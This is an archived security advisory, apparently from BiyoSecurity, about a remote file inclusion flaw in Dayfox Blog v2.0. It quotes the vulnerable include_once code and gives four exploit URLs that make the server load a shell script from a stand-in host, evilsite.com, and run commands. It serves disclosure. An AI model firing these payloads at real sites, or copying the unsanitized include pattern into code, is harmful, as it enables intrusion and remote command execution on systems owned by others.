TUCoPS :: Web :: Blogs :: b06-5020.htm

Dayfox Blog v2.0 Remote file include
Dayfox Blog v2.0 Remote file include
Dayfox Blog v2.0 Remote file include



# BiyoSecurity.Org=0D
=0D
# script name : Dayfox Blog v2.0=0D
=0D
# Risk : High=0D
=0D
# Regards : Dj ReMix=0D
=0D
# Thanks : Korsan , Liz0zim=0D
=0D
# Vulnerable files : =0D
=0D
adminlog.php=0D
postblog.php=0D
index.php=0D
index2.php=0D
=0D
# Vulnerable code :=0D
=0D
include_once ($slogin_path . "/slogin_lib.inc.php");=0D
include_once ($slogin_path . "/header.inc.php");=0D
=0D
=0D
Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id=0D 
=0D
http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id=0D 
=0D
http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id=0D 
=0D
http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id=0D 
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH